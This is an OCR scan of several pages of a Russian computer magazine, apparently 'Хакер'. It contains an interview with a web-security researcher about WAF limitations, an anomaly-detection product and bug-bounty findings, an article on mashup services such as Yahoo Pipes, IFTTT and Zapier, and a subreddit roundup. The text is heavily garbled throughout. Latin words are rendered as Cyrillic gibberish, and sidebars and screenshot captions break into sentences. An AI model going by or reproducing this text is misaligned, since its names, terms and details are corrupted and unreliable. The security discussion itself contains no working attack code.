ку какого-нибудь \М/АЕ вроде то4_зесигКу. Поначалу мы 
брались за это, но вскоре поняли, насколько бесполезен такой 
подход. Нужно постоянно поддерживать регулярные выраже- 
ния, править их, чтобы не было Та|5е’ов, — а это тоже очень 
трудно. Плюс от то4_зеси у жутко падает производитель- 


Пентест никак не помогает организо- 
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ОМ№ ес нередко органи- 
зуют конкурсы и квесты. 
На (егоМ! 9$ они делали 

«Царя горы». Не раз 
организовывали обход 
МАЕ (последний был 
на РНОауз). Регулярно 
организуют хак-квесты 
в рамках розыгрышей 
билетов на технические 
конференции. 


ность, а у заказчиков обычно дела с железом обстоят не очень 
хорошо. Поэтому мы отошли от такой практики и стали отве- 
чать: «Чуваки, настраивайте сами, это очень сложная работа». 
На тот момент с платными продуктами все было очень 
плохо. Были решения, которые просто не имели дистрибью- 
торов в России. Сейчас дистрибьюторы появились, но у них 
очень большие прайсы, что тоже отпугивает простых смертных. 
К тому же эти решения тоже совершенно неочевидны. Человек, 
не разбирающийся в безопасности, не сможет их применять. 
Любой М!АЕ — это система 12$ЛР$. Скажем, ты хочешь 
заниматься безопасностью, тебе нужно как-то работать с си- 
стемой, разбирать ее логи — а людей для этого у тебя нет. Это 
и есть самая большая проблема. 
Мы захотели сделать свое решение, но мы не делаем 
\!АЕ. Мы решили создать систему, которая будет лучше \МАЕ 
Предположим, администратор имеет место с ре- 
гулярными атаками. Они постоянно фиксируются в логах, 
потому что есть сканеры, серверные ботнеты, сканирования 
на баги \№огаРге$$, которого у тебя никогда не было... Все 
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это отражается в \ММАЕ Он радостно все это отбивает, что-то 
Та15е’ит, что-то нет. Но понять что и где — очень трудно. Это 
одна большая каша. И что же делать? 

Мы придумали решение, в котором такой каши не бу- 
дет. Систему, которая будет четко отвечать на перечисленные 
вопросы и встраиваться в зеситщу аеу@мортет Шесусе, ко- 
торый все так любят и хотят внедрять. Плюс все это сделано 
для простых смертных, а не для «архитектурно зрелых» чува- 
ков. Простая, удобная и понятная система. 

Как сделать систему, которую нельзя обойти? 
Нужно дать ей возможность динамически изменять свое 
состояние. Когда состояние системы меняется, все стано- 
вится сильно сложнее. Даже если у тебя на руках имеется 
какой-то байпасс, ты его подобрал и применяешь, он будет 
работать лишь какое-то ограниченное время, а после пере- 
станет. По крайней мере, у тебя нет возможности эту же 
багу на ошибку регулярки то4_зесигЙу раскатать по всем 
уязвимостям. Ведь они все в разном состоянии, вычленить 
которое почти невозможно за время жизни этого состояния. 
Вот и вся хитрость. 

Что там внутри? Нейронные сети и машинное обуче- 
ние — только красивые слова. Большинство людей бросаются 
такими терминами, как нанотехнологиями, но ни разу в жизни 
нейронную сеть не делали, а если и делали, то не очень пред- 
ставляют, как это связано с какими-то реальными процессами. 
Поэтому я предпочитаю термины «аномалия», «статистика». 
Это более понятные и честные определения того, что физиче- 
ски можно сделать в алгоритмах. 

Сейчас у нас уже есть совместный релиз с НаШоаа 
ЕаЬ. Инсталляция уже работает для клиентов Огаюга. Людям, 
которые хотят включить эту опцию бесплатно, надо отправить 
заявку на Б&а-аг@оп5ес.ги. 

Клиенты смогут установить систему локально 
у себя. Они все равно будут работать с нашим облаком, 
но при этом трафик перегонять туда не будут. 

Это наиболее оптимальный вариант — мы не будем ви- 
деть трафик и «живые данные», не будем их обрабатывать. Мы 
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Когда не было интернета и был только 486-й, обо 
всех технологиях я узнавал из «Хакера». Тогда писа- 
ли очень веселые статьи вроде «истории взломов», мало 
что было понятно, но было очень интересно и захватыва- 
юще. Сейчас я иногда перечитываю их с улыбкой :). Так же 
я познакомился с УМХ. 

Алиас Володя Воронцов появился тоже из жур- 
нала «Хакер». Я написал статью и подписал ее Володей 
Воронцовым. Я не знаю почему. Ника у меня тогда еще 
не было, вот и придумал такое. Это был 2008 год. 

Когда я отправил статью, мне ответили, что еще ну- 
жен ник. Так появился и 907прр. 

Самое главное — я никогда не шифровался, все 
получилось как-то само собой. Я сочинил этого Воло- 
дю Воронцова... от балды. Я боялся, что мой работодатель 
прочитает мои статьи и не очень хорошо к этому отнесет- 
ся. Я не хотел такого и изобрел псевдоним. Наверное, 
многие так поступают. Но больше это я по глупости сде- 
лал, не подумав. А потом оно примелькалось, ко мне стали 
относиться как к автору этих статей, и я не мог отвечать 
по-другому. 

Для большинства людей я деанонимизировался 
сразу. Вопрос принципов общения, каких-то жизнен- 
ных ситуаций. А вообще, недавно деанонимизировался 
официально, выступив на конференции РИТ++. Надоело 
немного. Хотя какая разница, вон Крис Касперски живет 
и не парится. У меня похожая ситуация, и она меня тоже 
мало волнует. Главное, чтобы каких-то глупых, ненужных 
ассоциаций не возникало. Если не возникает и люди отно- 
сятся ко мне хорошо, то мне не принципиально, как меня 
зовут. 
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ТЫСЯЧ 
— С ТАКОЙ 
СУММЫ НА- 

ЧИНАЕТСЯ ЦЕНА 

АУДИТА ВЕБ- 
ПРИЛОЖЕНИЯ. 
И ДОХОДИТ 
ДО БЕСКОНЕЧ- 
НОСТИ 
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будем видеть только выборочную выжимку, которую сформи- 
рует наша инсталляция у клиента. 

Какие-то крупные компании, которые захотят ставить 
его у себя, будут внедрять нас как ${4апа аопе. Это подой- 
дет для поисковых систем и проектов подобного рода. 

Зачем вообще нужен продукт из коробки? Мы делали 
продукт, ориентированный на конкретные требования. Первое 
и основное требование — производительность. Мы создавали 
очень производительную систему, непохожую на все, что сей- 
час существует. Благодаря этому наша система способна об- 
рабатывать много запросов и вносить маленькую [епсу, даже 
если стоит посередине. 

Второе требование: мы сделали систему, которую 
можно использовать в В! Оата, то есть в проектах с огром- 
ными нагрузками. Когда у тебя огромная инфраструктура, 
ты даже не можешь переконфигурировать фронтенды. Если чуть 
изменишь настройки, это отклонение от производительности 
получится настолько сильным (в масштабах тысяч фронтендов), 
что тебе придется все вернуть на место. Поэтому мы делали си- 
стему, способную внедряться даже в очень нагруженные проек- 
ты, не меняя их, не внося погрешностей в ихнормальную работу. 

Если у тебя большая производительность, твоя зада- 
ча — обработать все вообще без задержки. Твоя идеоло- 
гия — брать и обрабатывать запросы. Если ты будешь делать 
это в реальном времени, всегда будет |щепсу. Но если делать 
это не в реальном времени, используя очередь, задержек 
можно избежать. 

Суть В!3 Вайа в том, чтобы обрабатывать запросы 
не в реальном времени, а ориентируясь на то, чтобы си- 
стема переваривала ровно столько, сколько она может пере- 
варить. Тогда, увеличивая ресурсы нашей системы, мы умень- 
шаем время реакции на атаку. 

Время реакции на атаку важнее, чем блокировка дан- 
ных. Атака редко происходит в один запрос, никакой гений 
с одного НТТР-запроса не сломает систему. Сначала он про- 
ведет некую подготовительную работу, и уже на этом этапе 
система его узнает. Узнает не его 1Р-адрес, а именно профиль 
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человека, который совершает примерно вот такие действия. 
И этот профиль блокируется. Дальше, если система понимает, 
что эти действия правда опасны, она выкидывает этого чело- 
века и уведомляет, что вот здесь — реальная проблема. Все. 
Потом ты автоматически решаешь задачу и защищаешь си- 
стему. Кстати, такие идеалы в некоторые коммерческие про- 
дукты тоже вложены, но работает это не так. Долго объяснять, 
но не так :). 

Проблема 0-Чау вообще не в том, что они существу- 
ют, а в том, что под их блокировку невозможно настроить 
никакие сигнатуры. По понятным причинам — ведь ты его 
не знаешь, на то он и 0-дау. А мы умеем блокировать 0-дау 
не по сигнатурам. Именно поэтому нас очень трудно обойти, 
вернее, практически нереально. 


ВЕМАРО-ПРОГРАММЫ 

Как стать хорошим практическим безопасником? Нужно 
пойти в лес, найти пенек и перевернуться через него три раза. 
Ну конечно, нужно работать, работать и работать. 

Что вообще такое «практический безопасник»? Это че- 
ловек, который получил возможность что-то поломать и чест- 
но выполнил свою работу. Чтобы что-то поломать и не нару- 
шить закон, не нужно делать ничего. Достаточно скачать любое 
ореп зоигсе приложение, каких миллион, и расфигачить его. 
А потом уведомить разработчиков и дождаться релиза ис- 
правлений до публикации уязвимостей. Или воспользоваться 
программой вознаграждений какой-нибудь компании — тогда 
ты вообще будешь самым настоящим, профессиональным 
практическим безопасником. Ведь ты будешь делать свою ра- 
боту и фактически не нарушишь никаких законов. 

Любая программа вознаграждений — это неокупающи- 
еся деньги, зато на таком хорошо делать имя. Во всем этом 
больше РВ, нежели чего-то еще, однако РВ не всегда уда- 
ется получить. Проблема программ вознаграждений в том, 
что они нужны, чтобы платить людям «немножечко денег», 
ане для того, чтобы прославить их. 

Часто бывает, что организаторы программ принципи- 
ально против разглашения деталей уязвимости, хотя это 
не по правилам. Они говорят: «Да, вы сделали классную штуку, 
но вы не должны никому о ней рассказывать». Хотя это проти- 
воречит самой сути программы. Но вот так бывает, когда не- 
ожиданно получаешь гоо{ там, где надо было ХЗ$'ки искать :). 

Если организаторы возражают против огласки, они 
сами же от этого страдают. У них получается зесищу Бу 
обзсигЙу. Им кажется, что если они не будут никому говорить 
о своих глупых багах, то таковых станет меньше. На самом 


МЕСЯЦ В СРЕД- 
НЕМ ЗАНИМАЕТ 
АУДИТ ВЕАСК ВОХ 
И 2-3 МЕСЯЦА 
АУДИТ \МНИЕ 
ВОХ (В ЗАВИСИ- 
МОСТИ ОТ ОБЪ- 
ЕМА ИСХОДНОГО 
КОДА) 
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деле не станет. А вотесли донести эту инфор- 
мацию до масс, когда все узнают о таких ба- 
гах, то и люди организатора тоже — о чудо! — 
будут лучше об этом информированы. 

В целом к гемгага-программам я отно- 
шусь положительно. Стараюсь поддержи- 
вать людей. По мере возможности стараюсь 
помогать им, высылать что-то интересное. 

Сам я участвовал в ряде программ. 
В Яндекс засабмитил больше двадцати ба- 
гов. Все они были критические, серверные — 
глупых Х$$ не было. Я находил баги в чтении 
файлов, отправке запросов, инжекты, ошиб- 
ки логики, обход авторизации. 

С «Островами» вышло смешно. Сра- 
зу после объявления о них и открытия беты 
(реа.уапаех.ги) я поломал их через паблик. 
Минут через пять. Илья Сегалович (один 
из основателей Яндекса. — Прим. ред.) на- 
писал в твиттере, что они выпускают новую 
систему поиска, кто-то ретвитнул это сообще- 
ние — ая нажал на ссылочку и сразу нашел 
несколько уязвимостей и одну критическую. 
Хотя бага простая была, всего лишь на ско- 
рость задачка. 

Получил вознаграждение и от Соод!е 
за Спготе. В браузере был обход ограни- 
чений, а именно в функционировании зате 
опата! ройсу. Это ошибка логики. Я ничего 
не реверсил, ничего не делал — просто нашел 
ошибку. Через этот баг можно было с НТМ!-странички тырить 
локальные файлы на машине пользователя. Причем она рабо- 
тала в те времена, когда в Спготе еще не было своего ридера, 
через Назй и РЫЕ Эксплойт там состоял из трех частей. 

На самом первом РНО я рассказывал про эту багу, 
но к тому моменту в Спготе уже появился свой ридер, а бага 
исполнялась только через продукты Адоре и только в Спготе. 
То есть тогда она уже не имела особого смысла. 

Мой смартфон МоК!а — это тоже приз от Мона за уча- 
стие в их геммага-программе. 


ПАРА СОВЕТОВ ИТРЕНДЫ ИБ 

Проблема продуктов обычно в том, что их делают про- 
граммисты. Они и обходятся и работают так, как нужно про- 
граммистам или чуваку, что писал техническое задание. Прак- 
тически нет продуктов, которые делают люди, умеющие ломать. 

Совет разработчикам веб-приложений всегда один: 
если берешься на чем-то писать проект, пиши его и вы- 
пускай только тогда, когда уверен, что изучил инстру- 
мент, который используешь. Изучил то, на чем пишешь. 
Чаще всего ошибки основаны именно на том, что люди ис- 
пользуют нечто, не понимая, что хотят сделать. Если ис- 
пользуешь оЦес{ геайопа! тоае|!, попробуй сначала понять, 
что это, и только потом писать на нем код, используя эту па- 
радигму. Возможно, сейчас он тебе не подходит. Или наобо- 
рот — возможно, он подходит тебе, но ты поленился до кон- 
ца понять, о чем это. 

То же самое в РНР. Там много интересного, опять же 
много фреймворков. Часто проблему пытаются решить не так, 
как нужно, и отсюда возникают новые проблемы. 

Важный совет: нужно следить хотя бы за при! уайааноп. 
Проверяйте все данные, приходящие от пользователя, от его 
запроса. Если вы вообще как-то их обрабатываете, то сначала 
их нужно проверять. Это сразу ощутимо сократит количество 
ошибок, по сути, останутся только ошибки логики. 

К получению сертификатов я лично отношусь плохо. 
Готов обучаться у профессионалов, но таких совсем немного, 
ксожалению. Они есть, конечно, но в России тренинги не ведут. 

Тренды уже давно примерно одинаковы, из года 
в год. Это инъекции, как бы их ни называли. Они всегда будут, 
они самые тупые, простые и жесткие. 

Также сейчас публикуется много ошибок авториза- 
ции, ошибок логики. Из недавнего — это история со сменой 
пароля в ЗКуре. Это чисто логические баги, а не классические 
шпру{ уа!аайоп. Так сложилось, что их нашли очень много за по- 
следнее время. 2= 
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ТРУБНЫЙ 
РЕБЕНОК 


Как объединять веб-сервисы в новые инструменты 


Отличительная особенность многих веб-приложений в том, что они, практи- 
чески соответствуя канонам УМ!Х-мау, превосходно выполняют одну функ- 
цию, лишь иногда предполагая некоторое ограниченное взаимодействие. 
Но для того чтобы аналогия была полной, не хватает главного элемента — 
аналога пайпов, который позволил бы связывать между собой сервисы 

для получения нового функционала. Мы подобрали инструменты, отлично 
решающие эту задачу, — различные мэшапы и автоматизаторы, способные 
связать разрозненные продукты в единое рабочее окружение. 


У 


Михаил Еловских 


мтопайик@атан. сот 


Трубный ребенок 
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УАНОО Р!РЕЗ 


ез.уапоо.сот 


Первыми в нашем списке идут «трубы» — бесплатный сервис, который по праву можно 
назвать «дедушкой» жанра мэшапов. Основная идея — обработка потоков текста путем 
каскадного навешивания различных фильтров, агрегаторов и обработчиков. Чувствуется, 
что разработчики вдохновлялись старым добрым юниксовым пайплайном. Пользователю 
предлагается прибегнуть к базе уже существующих пайпов или создать свой. По сути, каж- 
дый пайп — это неболышая программа, которая пишется или, скорее, рисуется в специ- 
альном редакторе. 
В основе пайпов лежит несколько базовых понятий: 
1. Источник данных (все крутится вокруг формата Н$5, то есть это сам В$$-фид, поиско- 
вая выдача либо запрос на специальном языке УО|.). 
2. Пользовательский ввод — данные, которые можно вводить в специальные поля пайпа 
для изменения логики его работы. Например, ник в твиттере или поисковый запрос. 
3. Обработчики — множество различных функций, которые на вход получают данные из 
пользовательского ввода или источника, что-либо с ними делают и выдают результат 
своей работы. Кстати, в качестве обработчика можно использовать даже другой пайп. 


Также стоит отметить, что результат выполнения пайпа можно получать в различных 
форматах при запросе специального адреса вида: ПИ ез.уапоо.сот 
11=Р!РЕ_\10&_гепаег=|зоп, что делает возможным использовать его в своих скриптах или на 
странице сайта. 

Все это, с одной стороны, делает пайпы довольно гибким инструментом для обработки 
данных, с другой — добавляет некоторую сложность в написании своих «скриптов». Кстати, 
на сайте есть еще и куча уже готовых и работающих пайпов на разные случаи жизни. На- 
пример: 

. _ 0И.у/12х52Тт — пайп для генерации единого А5$-фида из ОРМЕ-файла (специальный 
формат для составления списка фидов); 
. ОИ. у/1ЗЕОа — универсальный поиск по куче различных ресурсов, фильтрующий и агре- 
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№ ТЬ5 ТВеп Тваё — настоящий любимчик публики, один из самых популярных сервисов по- 

добного рода. Он предлагает несколько иной подход к обработке данных, нежели Уапоо 

Рре$, — в основе лежит идея веб-хуков. 1ЕТТТ взаимодействует со множеством АР! раз- 

личных сервисов, позволяя создавать рецепты — мини-скрипты определенного формата. 

Рецепт состоит из триггера — условия, по которому обрабатываются данные (новый файл 

в дропбоксе, новый твит, новая фотография в инстаграме), и действия, которое выполня- 

ется в случае срабатывания триггера (написать письмо, изменить статус в фейсбуке). Дан- 

ные обновляются периодически, раз в 15 минут, поэтому особой задержки в реакции на 
триггеры не происходит (кстати, некоторые триггеры срабатывают, как только происходит 
определенное событие, — в!ЕТТТих называют «молниеносными»). Стоит отметить, что, не- 
смотря на всю простоту идеи, 1ЕТТТ довольно мощный сервис, позволяющий настраивать 
синхронизацию и автоматизацию различных сервисов. При создании рецепта существует 
еще такое понятие, как ингредиенты, — по сути, контекст выполнения триггера, в котором 

присутствуют переменные значения, такие как текст твита или тема письма. Их можно и 

нужно использовать в действиях (если, конечно, они получают какие-то данные на ввод). 

Замечу еще, что сервис ну очень приятно выглядит и имеет довольно большую базу уже 

готовых рецептов (можно также поделиться и своими). Изтех, которыми пользуюсья: напо- 

минание о погоде на почту, а также автоматическая загрузка понравившихся фотографий 
на дропбокс. 
Также интересными мне показались следующие рецепты: 

. Ведение журнала всех понравившихся видео с УочТире в Еиетще. Для этого создадим 
новый рецепт, в качестве «ТГ!$» укажем канал УочТибе, триггер Мем/ Тауоще маео, а в 
качестве «Тпа{» — канал Еуетще, действие Аррепа то пще. Осталось ввести настройки 
действия (журнал, в который сохранять заметку, имя заметки и тому подобное) — и го- 
тово. 

. Автоматический загрузчик файлов из Ста! в Огорбох. Рецепт состоит из триггера 
Стай —> Мем/ етай от зеагсй и действия Огоррох -+ Ада Не Нот УАЕ. Дополнительно 
в настройках указываем поле «Зеагсй ог: аомпюач Не» и назначаем папку для за- 
грузки. Теперь можно самому себе послать по почте ссылку на файл — он автоматом 
окажется в папке дропбокса. 
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2АРТЕВ 


ПЕ рэ://7ар!ег.сот 


Гар!ег появился чуть позже 1ЕТТТ, но логика работы тут полностью та- 
кая же: есть рецепты (только здесь они называются запы), события и 
действия. Есть база готовых запов и возможность создавать свои. На 
самом деле оба мэшапа очень похожи, и все их различия появляются в 
результате разницы подхода: если 1ЕТТТ — это сервис автоматизации 
твоей социальной активности, который должен просто облегчить жизнь, РИЧИ НИ че чт Е ЧИ чи 
то Харег — это бизнес-инструмент, который может решать и вполне ра- Я И ДВ рей И тт 
бочие вопросы (для этого в сервисах присутствуют Ведтте, Гепаезк, А т 
Азапа, ЭПорНу и РауРа!). Основная киллер-фича запиера — количество 


у = 
сервисов. Если в 1ЕТТТ их в районе 60, то тут их около 250. Создатели, Ра С (м А) 2 4 я м 


кажется, взяли курс на подключение всего, что только можно, — и это ты 


АДД Азапа ТазК со боое Са!епдаг 
Аиогпансайу а99 Азапа Га5К$ го бооре Саепдаг. 


здорово. Самый главный минус (разумеется, для пользователей) — сер- Е = 
вис платный. Конечно, тут есть бесплатный план, для того чтобы можно ь а: = # (© в. < 


было попробовать сервис, но его возможности совершенно несравнимы МИН ИН. В. _ ЕЕ. ДН се, М 
с бесплатными возможностями П1ЕТТТ. Цены, кстати, тоже не символиче- а (:) % зу ` 9 Г 
ские — минимальная подписка стоит 15 долларов в месяц, поэтому мне | 
кажется, что целесообразность использования запиера упирается в то, 
окупается ли его цена лично тебе. И если, например, он сильно сэконо- '’ Риск усуг Тизрег апд Асноп Гог 1 Хар 
мит время фрилансеру, освобождая от неприятной рутины, — то почему 
бы и нет? Примеры рабочих действий: 

. Автоматическое создание тикета в Ведтте из записи в Еметае. @ = в @ имо 

Событием выбираем Еуетое —› Мем Мае, действие — Редтте -» 


Мана ириаот? бо окобоги на Фар 1егпраье абату, 


ое Сирота" - зади 
Сгеае 1$5ие. Не забываем указать имя журнала в Еметоте, для кото- 
и ое ти = 80 тив _ 
рого применим данный зап. АЙ... 
. Напоминание в НрСпа{ при создании карточки в Тге!ю. Тут все со- 
всем просто: событием служит ТгеНо —› Мем/ Сага, в роли действия | сое | 


НирСПа{ > Сгеае Ме$5аде. 


Гартег — продвинутый клон ТЕТТТ, способный решать вопросы м 
М бизнес-пользователей. Увы, минимальная подписка стоит 15 $ 


Зеагсв диегу: — Метеорит СООСЕЕ АГЕ ВТЗ 
мимим/.доо(е.сот/аег{$ 
Кезий (буре: Еуегутта ` 
А это уже сервис от поискового гиганта. В его основе лежит идея мониторинга результатов поиско- 
Ном оНеп: — Аз-И-паррепз ` вого запроса с течением времени. Фактически ты можешь настроить «алерты» на появление новых 
результатов по запросу. На самом деле, что может быть логичней и правильней — ведь база гугла 
Ном тапу: — Оту\ве Без4 гозиИз м обновляется все быстрее и быстрее. Они умеют фильтровать всякий мусор и отбирать наиболее ре- 
левантные данные. В списке параметров оповещения: 
Оеймег 10: — Реед й . сам запрос (поддерживается также синтаксис поисковых запросов гугла); 
. тип запроса (все, новости, блоги, видео, обсуждения, книги); 
СВЕАТЕ АЦЕВТ Мападе усиг аюпз . частота уведомлений (в режиме реального времени, раз в день, раз в неделю); 
. фильтр лучших результатов или всех; 


. отправка результатов на етай или в виде В$$-фида. 


кот Что таким образом можно мониторить? Я думаю, каждому — свое. Кто-то может мониторить 
рии ине скидки на товары или услуги, кто-то — новости о падениях метеоритов. А можно вбить свое имя и 
ме - а ник и получать новые упоминания в интернете. Кстати, еще одним вариантом использования будет 
ны < ресоенсаацИ отслеживание новостей о новых уязвимостях какого-то продукта, например: «На!$ МУитпега Ку» — для 
в : неа оповещений о новых проблемах в безопасности фреймворка. 


Итак, в качестве полезных юзкейсов: 
. отслеживание скидок, купонов. Для этого создаем алерт со словами «соироп со4де» ОН «соц! 
сое»; 
. оповещение при появлении новых упоминаний о человеке — алерт с именем и ником в твиттере. 
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Мэшап-сервис для работы с файлами. Он схож в идее с 1ЕТТТ, но с уклоном на обработку фай- 


_) Сопмей Ио РОР лов. Единственное событие здесь — добавление в папку облачного хранилища (поддержива- 

ются Огорбох, дооЧе Опуе, Зку0п\уе, Вох) файла, а вот действий здесь может быть довольно 
_) РОР® ТХТ много: 

Синхронизация с другими облачными хранилищами Вох, ЗКу)име, Сооде Оп\уе, а также с 
о ЧУрюад Ию бооде Опме ЕТР-сервером. 

Для изображений возможны различные простые операции, типа изменения размера, пере- 
С) РИ Ма бооде Сюца Ри вода в оттенки серого, поворот, добавление водяного знака. 


’ Для звуковых файлов — конвертация в другой формат. 

. Для текстовых файлов: конвертация в РОЕ форматы электронных книг, загрузка на КтпаЕ, 
распечатка через облачный принтер СооЧче. 

. Для всех типов файлов: добавление в архив, переименование, шифрование/дешифрова- 
ние. 


есь рыл о Чон це 


В принципе, удобно, если нужно настроить какую-то автоматическую обработку файлов (на- 
пример, новых скриншотов), а другие сервисы ничего для этого предложить не могут. 

а Для настройки синхронизации папки Огорбох с ЕТР-сервером необходимо авторизовать веб- 
пар елка Форт Ра приложение, выбрать папку для синхронизации (или создать новую) и ввести реквизиты ЕТР- 
Ва сервера. 

Для автоматического конвертирования аудиофайла также укажем нужную папку, для которой 
будет работать действие, выберем действие Сопует Ацаю и соответствующий формат (МР3З, 
АЕ, ЕГАС, МАА, ОСС, \МАХ или ММА). Удобно, если подходящего конвертера под рукой не ока- 
залось. 


ОМ{Х} 


Пр: //\М/М/М. ОПХ. $ 


Несмотря на то что мы сегодня рассматривали исключительно веб-приложения, я решил добавить этот 
интересный проект от Мгсгозой. оп{Х} — это приложение для андроида, которое позволяет делать при- вее  о 42955. 
мерно то же самое, что и описанные выше сервисы, — выполнять действие при наступлении опреде- 


пез еди 
ленного условия. 
Из интересных особенностей: 
. Правила (они же рецепты в терминологии 1ЕТТТ) пишутся на уауасиру. ® + з (&) 


. В качестве триггеров могут выступать различные источники данных (в том числе и сенсоры телефо- В/пд \!Неп опе ой ту Нгее поз! _ 
на): погода, время, новости, сигнал М/-Н-сети, уровень батареи и СР$-положение. {недиеп( согас{з саЙ$ еуеп И ту т — и 

< > . . м = КЕ 
. Вкачестве действий можно также пользоваться АР! телефона, показывая уведомления, запуская при- рпопе 1$ $Нег\ > /-9ым 


ложения и совершая другие действия. 


С 


(+) | 
> И 
Проект скорее экспериментальный, но это не помешало ему обрасти сообществом энтузиастов. в. 

Разумеется, в лучших традициях подобных сервисов, есть возможность создавать новые рецепты, об- Аетипд те 10 спеск т изи9 

мениваться ими и устанавливать (считав телефоном специальный ОВ-код). Роигзааге мпеп Г ат п опе ой ту 


рор\аг р!асез {ог а 1еаз{ 20 
Поскольку, в отличие от предыдущих проектов, здесь используется АР! телефона, а рецепты пишут- р В 


ся на настоящем языке программирования, у разработчика появляется дополнительная свобода для ыы 
творчества. Из наиболее интересных правил можно отметить: 
. правило, заставляющее телефон проиграть рингтон, если звонит кто-то из трех твоих самых частых $ ии [бо 
контактов, даже если телефон находится в тихом режиме 01.1у/18\/7ХОб; фаипсв {Ве тизс арр мПеп | ат 
. напоминание взять с собой зонт при первой разблокировке экрана с утра, в случае если сегодня по ма!Кт9 


прогнозу ожидается дождь БИ.1у/МанзЕц. = 
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Разумеется, тебе знаком ресурс № ОАШУРВОСВАММЕВ 
гедчак.согт, Хотя он не СТОЛЬ популя- Этот сабреддит будет полезен тем, кто смыслит в програм- 
рен в наших широтах, как на Западе. Мария «МИг!» Нефёдова мировании и предпочитает держать голову «в тонусе». Если 

| тИиН@геа!.хаКер.ги ты как раз не знаешь, чем бы занять мозг в свободное от рабо- 
Ведак — это странная штука, которая ты время, — добро пожаловать. В /г/Чайургодгаплтег постоян- 
«по-научному» называется социаль- 


но публикуются разнообразные программистские челленджи. 

ным новостным сайтом. Несмотря задачи легкого уровня, по средам — среднего, а по пятницам — 
т настоящий хардкор. 

на популярность социальных сетеи, Все задачи добавляются самими пользователями, модера- 

гедай продолжает расти и процве- торы сабреддита их лишь обновляют. Решение можно писать 


Существует простое расписание: по понедельникам публикуют 
ы на любом языке, приветствуются креативность и нетривиаль- 
тать. Сегодня речь поидет не о самом ность подхода. Проверяют решения самим же комьюнити, 
гедай и его истории, а о том, как со- что добавляет процессу дополнительной остроты. Здесь также 
существует собственная система достижений — пользователи 
риентироваться в океане информа- М И НУТ могут получать серебряные или золотые медали за самые раз- 
< | ные заслуги. Ценится все — отхороших алгоритмических навы- 
ции, которыи он предлагает. Аедок В СРЕДНЕМ ков до самого чокнутого или смешного кода. 
славится сабреддитами (подреддиты, 
5ибгедаав$) — сообществами, клуба- ПОЛЬЗОВАТЕ- 
ми по интересам. Их десятки и сотни ЛИ ПРОВОДЯТ 
тысяч — развлекательных и полез- НА КЕБОП, ЧТО 
ных, популярных и интересных узкому ОЧЕНЬ МНОГО 
кругу людей. Для начала предлагаем ПО СОВРЕМЕН- 
подборку гарантированно интересных НЫМ СЕТЕВЫМ 
и тематических сабреддитов. МЕРКАМ 


ТЕСНЗОРРОВТ ВУТОАРС 


Казалось бы, название этого сабреддита говорит Крайне полезный сабреддит, чье существование в очередной 
само за себя — техподдержка она и в Африке тех- раз доказывает: хоронить ПК пока все же рановато, несмотря 
поддержка. Однако все не так просто, как кажется на победное шествие смартфонов и планшетов по миру. Саб- 
на первый взгляд. Нет, здесь в самом деле часто реддит о самостоятельной сборке и планировании ПК читают 
спрашивают совета по самым разным софтверным, больше 120 тысяч человек. Здесь можно задавать любые во- 
железным и прочим айтишным вопросам и обсуждают просы о «компьютерных потрошках». Сборка оптимальной 
любые технические проблемы. У этого сабреддита де- системы водяного охлаждения, сборка бесшумной системы, 
сятки тысяч читателей, так что здесь накоплено немало перестановка компонентов из ноутбука в стационарный ПК, 
ценной информации. В наличии, к примеру, подборки просто создание сбалансированной конфигурации в преде- 
по удалению вирусов и сборники полезных приложений. лах заданной суммы — все это и многое другое можно найти 
Здесь в целом велики шансы нато, что твою проблему уже здесь. От многочисленных ресурсов подобного рода сабреддит 
обсуждали и решили (достаточно просто поискать). Од- отличает действительно полезный, быстрый и весьма добро- 
нако этот сабреддит отличает именно универсальность — желательный фидбек. Запостить свою конфигурацию на суд 
за помощью сюда обращаются как подкованные профес- общественности можно по уже готовому шаблону, что тоже об- 
сионалы, так и простые пользователи (притом любых операционных систем и девайсов). легчает жизнь. К тому же в /"/биНаарс накоплено великое мно- 
Разумеется, количество простых юзеров перевешивает, и чтение /гАесйзиррой превраща- жество «железной» мудрости в форме статей, видео и прочего, 
ется в неплохое развлечение. Вопросы вроде «|! да сотрщег зтрреЧд Нот Атепса, мл! И так что, вероятно, спрашивать не придется вовсе — достаточно 
соппес {о Аизгайап итегптет?» здесь совсем не редкость. воспользоваться поиском. 


В дебрях геа ой 
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ЗОРЕНМТМС 


Стремительно набирающая популярность тема — ЗО)-принтеры. 
Еще лет пять назад сложно было помыслить о том, чтобы за- 
иметь 3ЗО0-принтер дома, для этого нужно было обладать не- 
дюжинным желанием, инженерной смекалкой и значительной 
суммой вечнозеленых денег. Теперь, когда в продаже стали 
доступны домашние модели, чья цена колеблется в пределах 
тысячи долларов, приобщиться к печати физических объектов 
стало значительно проще. /'/Зарипипа — настоящий кладезь 
информации о трехмерной печати. После чтения этого сабред- 
дита как-то сразу отпадают вопросы о том, как люди умудря- 
ются печатать на 3ЗО)-принтерах пригодные к использованию 
оружейные детали или зачем на Тпе Риме Вау нужен раздел 
с готовыми макетами. Здесь ты найдешь любую информацию, 
которую только можно собрать о З)-печати, — готовые макеты, 
обсуждения софта, в котором макеты строят, полезные ссылки, 
новости индустрии, всевозможные гайды и советы. Информа- 
ции здесь, пожалуй, больше, чем на форумах ВерВар. 


Г] 
о 
®° 


ЕЧЕ (ЕХРЕАМ 
ЫКЕГМРЕМЕ) 


Смешной, порой трогательный и, как ни странно, полезный саб- 
реддит, название которого переводится как «объясните мне 
так, будто мне пять лет». Вся суть ясна из названия: здесь мож- 
но попросить других людей объяснить тебе любое явление так, 
будто тебе пять лет. А это значит — никакой грубости и предвзя- 
тости, сплошное дружелюбие и простота. Троллей и неадекват- 
ных личностей здесь нещадно банят. Вот только несколько при- 
меров из /г/ехрат!кейтйуе: отличия основных христианских 
конфессий, социализм и почему все его не любят, протокол 
ТСРЛР, бозон Хиггса. Слабо объяснить подобное пятилетнему 
ребенку? Да, это настоящая головоломка, и люди, как ни стран- 
но, умудряются с ней справляться. По итогам обсуждений даже 
снимают серию видеороликов, где реальным пятилетним детям 
зачитывают объяснения различных мозгодробительных штук, 
данные пользователями ЕЧЕ Ипуий.сот/оа/уппа. 


1АМА 


Пожалуй, самый известный за пределами гедай сабредлдит, 

а также один из самых популярных — более трех миллионов чи- 
тателей. Название расшифровывается как «|! ат а» (я такой-то) 

или как АМА$ (Азк Ме Апуйта — спросите меня о чем угодно). 
Сабреддит открыт для всех, а значит, сюда может прийти любой 
человек и поведать о себе, отвечая на вопросы других пользовате- 
лей. Формат задает само название сабреддита: «Я хакер», «Я отец-оди- 
ночка», «Я профессиональная теннисистка», «Я люблю нюхать резину», 
«Я хочу полететь в космос» и так далее. Здесь существует только одно 
